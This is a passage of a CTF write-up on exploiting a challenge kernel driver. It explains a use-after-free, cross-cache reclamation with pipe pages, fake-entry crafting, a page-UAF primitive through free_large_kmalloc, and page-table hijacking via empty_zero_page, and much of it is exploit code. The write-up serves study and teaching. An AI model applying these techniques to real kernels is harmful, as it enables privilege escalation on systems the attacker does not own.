<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">corav_update_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">old_b</span><span class="p">,</span> <span class="k">struct</span> <span class="n">corav_bucket</span> <span class="o">*</span><span class="n">new_b</span><span class="p">,</span> <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">,</span> <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">,</span> <span class="n">bool</span> <span class="n">root_only</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="o">-</span><span class="n">EEXIST</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">corav_remove_entry</span><span class="p">(</span><span class="n">old_b</span><span class="p">,</span> <span class="n">e</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">=</span> <span class="n">sig</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">corav_insert_entry</span><span class="p">(</span><span class="n">new_b</span><span class="p">,</span> <span class="n">e</span><span class="p">);</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, <code class="language-plaintext highlighter-rouge">corav_free_entry()</code> resets certain fields before freeing the entry:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">corav_free_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">e</span><span class="o">-&gt;</span><span class="n">status</span> <span class="o">=</span> <span class="n">CORAV_ENTRY_DEAD</span><span class="p">;</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">e</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> will trigger a kernel panic if these fields contain invalid values:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">corav_verify_entry</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">corav_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">BUG_ON</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">status</span> <span class="o">!=</span> <span class="n">CORAV_ENTRY_ALIVE</span> <span class="o">||</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">sig</span> <span class="o">==</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This implies we must either reclaim the freed entry as another <code class="language-plaintext highlighter-rouge">corav_entry</code> or cross-cache it with objects of a different type.</p>

<p>Unfortunately, calling <code class="language-plaintext highlighter-rouge">corav_update_entry()</code> on the reclaimed <code class="language-plaintext highlighter-rouge">corav_entry</code> object does not cause any issues in this case, so we need to find some candidate objects for cross-cache.</p>

<p>A common target is <strong>the page backing <code class="language-plaintext highlighter-rouge">struct pipe_buffer</code></strong>, which allows us to read the data by reading from the pipe and overwrite it by writing to the pipe.</p>

<h3 id="32-spray-the-entries">3.2. Spray the Entries</h3>

<p>During the CTF, the success rate of reclaiming the entry object in my exploit was relatively low, which was quite frustrating. After comparing my exploit with the author’s, we discovered that the author used a <strong>pipe fd</strong> to hold the data read by the command handlers, whereas my exploit relied on the file <code class="language-plaintext highlighter-rouge">/storage/emulated/0/Download/test</code>. This file resides under the mount point <code class="language-plaintext highlighter-rouge">/storage/emulated</code>, which is mounted as a <strong>FUSE filesystem</strong>.</p>

<p>Since read/write operations on a FUSE filesystem are significantly slower than those on a pipe, this not only reduced the spraying efficiency but also introduced potential side effects: the write handler allocates page-cache pages, as the call trace below shows, so it may accidentally reclaim our target page.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>=&gt; __alloc_pages
=&gt; __folio_alloc
=&gt; __filemap_get_folio
=&gt; pagecache_get_page
=&gt; f2fs_write_begin
=&gt; generic_perform_write
=&gt; f2fs_file_write_iter
=&gt; do_iter_write
=&gt; vfs_iter_write
=&gt; fuse_passthrough_write_iter
=&gt; fuse_file_write_iter
=&gt; vfs_write
=&gt; ksys_write
=&gt; __x64_sys_write
</code></pre></div></div>

<p>As a result, I revised my exploit by following the author’s approach and <strong>using a pipe fd</strong> to store data:</p>
<ol>
  <li>Open a pipe.</li>
  <li>Use the write-end to store data.</li>
  <li>Pass the read-end to the command handler.</li>
</ol>
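<p>The three steps above can be sketched in user space as follows. This is an illustration under assumptions, not the exploit's actual helper: <code class="language-plaintext highlighter-rouge">store_value()</code> and <code class="language-plaintext highlighter-rouge">handler_read_sample()</code> are hypothetical names, and the latter merely imitates a handler that opens the path and reads up to 512 bytes. The point it shows is that each read drains exactly what was queued, so a single pipe can be reused for every iteration of the spray loop.</p>

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define SAMPLE_SIZE 512

/* Step 2: queue one value on the write end. */
int store_value(int wfd, uint64_t val)
{
    return write(wfd, &val, sizeof(val)) == (ssize_t)sizeof(val) ? 0 : -1;
}

/* Stand-in for the command handler: open the path, read one sample. */
ssize_t handler_read_sample(const char *path, void *buf)
{
    int fd = open(path, O_RDONLY);
    ssize_t n;

    if (fd < 0)
        return -1;
    n = read(fd, buf, SAMPLE_SIZE);
    close(fd);
    return n;
}

/* Returns how many rounds delivered exactly the stored value, or -1. */
int pipe_store_demo(int rounds)
{
    int pfd[2];
    int ok = 0;
    char path[64];

    /* Step 1: open a pipe. */
    if (pipe(pfd) < 0)
        return -1;

    /* Step 3: the read end is handed over as a /proc/self/fd path. */
    snprintf(path, sizeof(path), "/proc/self/fd/%d", pfd[0]);

    for (uint64_t val = 0; val < (uint64_t)rounds; val++) {
        unsigned char buf[SAMPLE_SIZE];
        uint64_t seen;

        if (store_value(pfd[1], val) < 0)
            break;
        /* A short read returns only the 8 queued bytes and empties the pipe. */
        if (handler_read_sample(path, buf) != (ssize_t)sizeof(seen))
            break;
        memcpy(&seen, buf, sizeof(seen));
        if (seen == val)
            ok++;
    }

    close(pfd[0]);
    close(pfd[1]);
    return ok;
}
```

<p>Because no filesystem write path is involved, this approach avoids the page-cache allocations that the FUSE-backed file triggered.</p>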

<p>Except for the file path, the cross-cache for <code class="language-plaintext highlighter-rouge">corav_entry</code> is similar to another kernel challenge. The relevant code snippet can be found in the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// [...]</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] create user entries in CPU-0</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="n">pin_on_cpu</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="n">ue</span> <span class="o">=</span> <span class="p">{};</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">ue</span><span class="p">.</span><span class="n">path</span><span class="p">,</span> <span class="n">tmp_file_path</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">val</span> <span class="o">&lt;</span> <span class="mh">0x2000</span><span class="p">;</span> <span class="n">val</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">set_tmp_data</span><span class="p">(</span><span class="n">val</span><span class="p">);</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">ioctl</span><span class="p">(</span><span class="n">corav_fd</span><span class="p">,</span> <span class="n">CORCTL_INSERT</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ue</span><span class="p">));</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">val</span> <span class="o">==</span> <span class="mh">0x1000</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">target_sig</span> <span class="o">=</span> <span class="n">ue</span><span class="p">.</span><span class="n">sig</span><span class="p">;</span>
            <span class="n">printf</span><span class="p">(</span><span class="s">"[+] target sig: %016lx</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">target_sig</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// [...]</span>

<span class="n">printf</span><span class="p">(</span><span class="s">"[+] delete all user entries</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="n">ue</span> <span class="o">=</span> <span class="p">{};</span>
    <span class="n">strcpy</span><span class="p">(</span><span class="n">ue</span><span class="p">.</span><span class="n">path</span><span class="p">,</span> <span class="n">tmp_file_path</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="n">val</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">val</span> <span class="o">&lt;</span> <span class="mh">0x2000</span><span class="p">;</span> <span class="n">val</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">set_tmp_data</span><span class="p">(</span><span class="n">val</span><span class="p">);</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">ioctl</span><span class="p">(</span><span class="n">corav_fd</span><span class="p">,</span> <span class="n">CORCTL_DELETE</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ue</span><span class="p">));</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="c1">// [...]</span>
</code></pre></div></div>

<h3 id="33-spray-the-pipe-page">3.3. Spray the Pipe Page</h3>

<p>By default, a pipe has a capacity of 16 pages, each of which is allocated only when data is written into it. Therefore, one can either create many pipes and use only a single page from each, or create fewer pipes and fully populate all 16 pages. In my exploit, I chose the latter approach.</p>

<p>Moreover, since <code class="language-plaintext highlighter-rouge">corav_verify_entry()</code> validates the entry object and is invoked frequently, and <code class="language-plaintext highlighter-rouge">corav_remove_entry()</code> treats the <code class="language-plaintext highlighter-rouge">-&gt;node</code> field as an rbtree node, it is necessary to craft fake entries with a non-zero signature, a valid magic number, and a properly initialized rbtree structure. Luckily, setting the rbtree node fields to <code class="language-plaintext highlighter-rouge">NULL</code> appears sufficient to bypass all the checks inside <code class="language-plaintext highlighter-rouge">__rb_erase_augmented()</code>.</p>

<p>The relevant part of the pipe-spraying code is shown below:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// [...]</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"[+] try to reclaim free slabs as pipe pages</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">tmp_buffer</span><span class="p">);</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">64</span><span class="p">)</span> <span class="p">{</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">tmp_buffer</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mh">0x0</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x6969696969696969UL</span><span class="p">;</span>
        <span class="o">*</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">tmp_buffer</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mh">0x8</span><span class="p">]</span> <span class="o">=</span> <span class="n">CORAV_ENTRY_ALIVE</span><span class="p">;</span> <span class="c1">// magic number</span>
    <span class="p">}</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">RECLAIM_PIPE_COUNT</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o">&lt;</span> <span class="mi">16</span><span class="p">;</span> <span class="n">j</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">SYSCHK</span><span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">reclaim_pfds</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">tmp_buffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">tmp_buffer</span><span class="p">)));</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
<span class="c1">// [...]</span>
</code></pre></div></div>
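<p>The inner loop above assumes the default capacity of 16 pages. A minimal sketch for checking that assumption on a given system is shown below; it queries the capacity with <code class="language-plaintext highlighter-rouge">F_GETPIPE_SZ</code> and then counts how many page-sized writes a non-blocking pipe accepts. The function name <code class="language-plaintext highlighter-rouge">fill_pipe_pages()</code> is hypothetical, and the fallback definition of <code class="language-plaintext highlighter-rouge">F_GETPIPE_SZ</code> is only there in case the libc headers do not expose it.</p>

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef F_GETPIPE_SZ
#define F_GETPIPE_SZ 1032 /* Linux: F_LINUX_SPECIFIC_BASE + 8 */
#endif

/* Fills a fresh pipe with page-sized writes.
 * Returns the number of pages accepted, or -1 on error.
 * *capacity_pages receives the capacity reported by the kernel. */
int fill_pipe_pages(long *capacity_pages)
{
    int pfd[2];
    int written = -1;
    long page = sysconf(_SC_PAGESIZE);
    int cap;
    char *buf;

    if (page <= 0 || pipe(pfd) < 0)
        return -1;

    buf = malloc((size_t)page);
    cap = fcntl(pfd[1], F_GETPIPE_SZ);
    /* Non-blocking, so the loop stops once the pipe is full. */
    if (!buf || cap < 0 || fcntl(pfd[1], F_SETFL, O_NONBLOCK) < 0)
        goto out;

    memset(buf, 'A', (size_t)page);
    *capacity_pages = cap / page;

    written = 0;
    /* Each full-page write occupies one pipe buffer backed by its own page. */
    while (write(pfd[1], buf, (size_t)page) == page)
        written++;

out:
    free(buf);
    close(pfd[0]);
    close(pfd[1]);
    return written;
}
```

<p>If the reported capacity differs from 16 pages, the inner loop bound of the spray would need to be adjusted accordingly.</p>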

<h3 id="34-primitive---page-uaf">3.4. Primitive - Page UAF</h3>

<p>Once a fake entry backed by a pipe page is inserted into the bucket, the question is: what can we do next?</p>

<p>Intuitively, one might attempt to leak a kernel address through rbtree operations and then corrupt the rbtree structure to escalate into a more powerful primitive. However, there is actually a simpler approach to achieving a page UAF, which is also something I learned from the STAR Labs Summer Pwnables challenge (thanks Billy for reminding me during the game).</p>

<p>For readers interested in the details, please refer to <a href="https://u1f383.github.io/linux/2025/09/01/starlabs-summer-pwnables-linux-kernel-challenge-writeup.html">my other post</a>, specifically the section <strong>“3.4. Intended Solution.”</strong></p>

<p>In short, we can ask the driver to remove the victim entry, which makes it free the entry. By the time the remove handler invokes <code class="language-plaintext highlighter-rouge">kfree()</code>, however, the entry <code class="language-plaintext highlighter-rouge">e</code> actually resides somewhere within the pipe page. Since this address does not belong to any slab, the function <code class="language-plaintext highlighter-rouge">free_large_kmalloc()</code> [1] is invoked.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">kfree</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">object</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">slab</span> <span class="o">*</span><span class="n">slab</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
    <span class="kt">void</span> <span class="o">*</span><span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">object</span><span class="p">;</span>

    <span class="c1">// [...]</span>
    <span class="n">folio</span> <span class="o">=</span> <span class="n">virt_to_folio</span><span class="p">(</span><span class="n">object</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">folio_test_slab</span><span class="p">(</span><span class="n">folio</span><span class="p">)))</span> <span class="p">{</span>
        <span class="n">free_large_kmalloc</span><span class="p">(</span><span class="n">folio</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">object</span><span class="p">);</span> <span class="c1">// [1]</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When the target object is located in an order-0 page, <code class="language-plaintext highlighter-rouge">free_large_kmalloc()</code> merely raises a warning [2] instead of aborting. Execution then continues, and the function eventually calls <code class="language-plaintext highlighter-rouge">folio_put()</code> [3] to release the page.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">free_large_kmalloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">folio</span> <span class="o">*</span><span class="n">folio</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">object</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">order</span> <span class="o">=</span> <span class="n">folio_order</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">order</span> <span class="o">==</span> <span class="mi">0</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="n">pr_warn_once</span><span class="p">(</span><span class="s">"object pointer: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">object</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">__folio_clear_large_kmalloc</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span>
    <span class="n">folio_put</span><span class="p">(</span><span class="n">folio</span><span class="p">);</span> <span class="c1">// [3]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>At this point, the pipe page is freed, leaving us with a powerful <strong>page UAF primitive</strong>. Awesome!</p>

<h3 id="35-hijack-page-table">3.5. Hijack Page Table</h3>

<h4 id="351-empty_zero_page">3.5.1. empty_zero_page</h4>

<p>We chose to use the page UAF primitive to hijack the page table, as this allows <strong>direct overwriting of kernel code</strong>. Besides the page table, one could also hijack shared libraries or other memory structures.</p>

<p>For my exploit, I used <code class="language-plaintext highlighter-rouge">0x80000000UL</code> as the base address, whose page-table indices are as follows:</p>
<ul>
  <li>PT (bits 20–12): 0</li>
  <li>PD (bits 29–21): 0</li>
  <li>PDPT (bits 38–30): 2</li>
  <li>PML4 (bits 47–39): 0</li>
</ul>
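<p>These indices can be double-checked with a few shifts and masks. The sketch below assumes x86-64 4-level paging with 4 KiB pages; <code class="language-plaintext highlighter-rouge">struct pt_index</code> and <code class="language-plaintext highlighter-rouge">pt_index_of()</code> are names made up for this example.</p>

```c
#include <stdint.h>

struct pt_index {
    unsigned pml4; /* bits 47-39 */
    unsigned pdpt; /* bits 38-30 */
    unsigned pd;   /* bits 29-21 */
    unsigned pt;   /* bits 20-12 */
};

/* Splits a virtual address into its four 9-bit page-table indices. */
struct pt_index pt_index_of(uint64_t va)
{
    struct pt_index idx = {
        .pml4 = (unsigned)((va >> 39) & 0x1ff),
        .pdpt = (unsigned)((va >> 30) & 0x1ff),
        .pd   = (unsigned)((va >> 21) & 0x1ff),
        .pt   = (unsigned)((va >> 12) & 0x1ff),
    };
    return idx;
}
```

<p>Stepping the address by <code class="language-plaintext highlighter-rouge">0x200000</code> increments only the PD index, so every address from <code class="language-plaintext highlighter-rouge">0x80000000</code> up to <code class="language-plaintext highlighter-rouge">0x80000000 + 511 * 0x200000</code> shares the same PML4 and PDPT entries while landing in a different page table.</p>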

<p>During initialization, I populated the first page. This ensures that the PML4 entry, the PDPT, the PD, and the first PT covering this region all exist. Subsequent mappings, spaced 2 MiB apart within the same 1 GiB region, therefore each require only <strong>a new PT page</strong>, rather than higher-level page table structures.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define BASE_MMAP_ADDR ((void *)0x80000000UL)
</span><span class="n">SYSCHK</span><span class="p">(</span><span class="n">mmap</span><span class="p">(</span><span class="n">BASE_MMAP_ADDR</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANON</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span> <span class="o">|</span> <span class="n">MAP_POPULATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
</code></pre></div></div>

<p>Once the page UAF was obtained, I mapped multiple pages and read from each mapping to trigger read faults, which install the <code class="language-plaintext highlighter-rouge">empty_zero_page</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">printf</span><span class="p">(</span><span class="s">"[+] spray pgtable</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">512</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">void</span> <span class="o">*</span><span class="n">ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span><span class="n">BASE_MMAP_ADDR</span> <span class="o">+</span> <span class="n">i</span> <span class="o">*</span> <span class="mh">0x200000</span><span class="p">;</span>
        <span class="n">SYSCHK</span><span class="p">(</span><span class="n">mmap</span><span class="p">(</span><span class="n">ptr</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANON</span> <span class="o">|</span> <span class="n">MAP_PRIVATE</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">));</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="k">volatile</span> <span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">ptr</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"owo</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
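<p>The <code class="language-plaintext highlighter-rouge">0x200000</code> stride matters because, with x86-64 4-level paging, one last-level page table covers exactly 2 MiB of virtual address space. The sketch below is only an illustration of that index arithmetic: <code class="language-plaintext highlighter-rouge">EXAMPLE_BASE</code> is a hypothetical stand-in for <code class="language-plaintext highlighter-rouge">BASE_MMAP_ADDR</code>, and the helper names are not taken from the exploit.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical base address; the real BASE_MMAP_ADDR is defined by the exploit. */
#define EXAMPLE_BASE 0x100000000ULL
#define STRIDE       0x200000ULL

/* x86-64 4-level paging: 9 index bits per level above the 12-bit page offset. */
unsigned pte_index(uint64_t va) { return (unsigned)((va >> 12) & 0x1ff); }
unsigned pmd_index(uint64_t va) { return (unsigned)((va >> 21) & 0x1ff); }
unsigned pud_index(uint64_t va) { return (unsigned)((va >> 30) & 0x1ff); }
unsigned pgd_index(uint64_t va) { return (unsigned)((va >> 39) & 0x1ff); }

/* Two addresses share a last-level page table only if they lie in the same 2 MiB region. */
bool same_pte_table(uint64_t a, uint64_t b)
{
    return (a >> 21) == (b >> 21);
}
```

<p>With a 1 GiB-aligned base, iteration <code class="language-plaintext highlighter-rouge">i</code> lands in PMD slot <code class="language-plaintext highlighter-rouge">i</code>, so every read fault in the loop forces the kernel to allocate a separate page-table page.</p>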

<p>The <code class="language-plaintext highlighter-rouge">empty_zero_page</code> is a 0x1000-sized <strong>kernel variable</strong> filled entirely with zeros. It lets the kernel avoid allocating a fresh page for anonymous memory that has only been read. The page-fault handler installs this special page whenever a fault is triggered by reading from an anonymous page that has not been populated yet.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">do_anonymous_page</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="cm">/* Use the zero-page for reads */</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">FAULT_FLAG_WRITE</span><span class="p">)</span> <span class="o">&amp;&amp;</span>
            <span class="o">!</span><span class="n">mm_forbids_zeropage</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_mm</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">entry</span> <span class="o">=</span> <span class="n">pte_mkspecial</span><span class="p">(</span><span class="n">pfn_pte</span><span class="p">(</span><span class="n">my_zero_pfn</span><span class="p">(</span><span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span><span class="p">),</span>
                        <span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_page_prot</span><span class="p">));</span>
        <span class="c1">// [...]</span>
        <span class="k">goto</span> <span class="n">setpte</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="nl">setpte:</span>
    <span class="c1">// [...]</span>
    <span class="n">set_pte_at</span><span class="p">(</span><span class="n">vma</span><span class="o">-&gt;</span><span class="n">vm_mm</span><span class="p">,</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">address</span><span class="p">,</span> <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pte</span><span class="p">,</span> <span class="n">entry</span><span class="p">);</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>

<span class="cp">#define my_zero_pfn(addr)    page_to_pfn(ZERO_PAGE(addr))
</span>
<span class="cm">/*
 * ZERO_PAGE is a global shared page that is always zero: used
 * for zero-mapped memory areas etc..
 */</span>
<span class="k">extern</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">empty_zero_page</span><span class="p">[</span><span class="n">PAGE_SIZE</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)]</span>
    <span class="n">__visible</span><span class="p">;</span>
<span class="cp">#define ZERO_PAGE(vaddr) ((void)(vaddr),virt_to_page(empty_zero_page))
</span></code></pre></div></div>

<p>Since it resides in kernel data, at a fixed offset from the kernel text for a given kernel build, we can use its physical address to <strong>calculate the physical address of the kernel text</strong>.</p>
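<p>As a rough sketch of that calculation, assuming a leaked PTE that maps the zero page: mask off the flag bits to get the physical address, then subtract the distance between <code class="language-plaintext highlighter-rouge">empty_zero_page</code> and the start of the kernel text. That distance is build-specific and would have to come from the target's symbol table; the function names and the values in the usage note are hypothetical.</p>

```c
#include <stdint.h>

/* Bits 12..51 of an x86-64 page-table entry hold the physical frame address. */
#define PTE_PHYS_MASK 0x000ffffffffff000ULL

/* Strip the flag bits (present, NX, special, ...) from a leaked PTE. */
uint64_t pte_to_phys(uint64_t pte)
{
    return pte & PTE_PHYS_MASK;
}

/*
 * zero_page_offset is the build-specific distance between empty_zero_page
 * and the start of the kernel text (an assumption supplied by the caller).
 */
uint64_t kernel_text_phys(uint64_t zero_page_pte, uint64_t zero_page_offset)
{
    return pte_to_phys(zero_page_pte) - zero_page_offset;
}
```

<p>For example, a leaked PTE of <code class="language-plaintext highlighter-rouge">0x8000000004a13225</code> with an assumed offset of <code class="language-plaintext highlighter-rouge">0x2a13000</code> gives a kernel text physical address of <code class="language-plaintext highlighter-rouge">0x2000000</code>.</p>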

<h4 id="352-trampoline-pgd">3.5.2. Trampoline PGD</h4>

<p>Even without using <code class="language-plaintext highlighter-rouge">empty_zero_page</code>, Linux still keeps some data at fixed physical addresses, and we can leak kernel addresses from it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@lts-6:/# <span class="nb">cat</span> /proc/iomem
00000000-00000fff : Reserved
00001000-0009fbff : System RAM
0009fc00-0009ffff : Reserved
000a0000-000bffff : PCI Bus 0000:00
000c0000-000c9bff : Video ROM
000ca000-000cadff : Adapter ROM
000cb000-000cb5ff : Adapter ROM
000f0000-000fffff : Reserved
<span class="c"># [...]</span>
</code></pre></div></div>

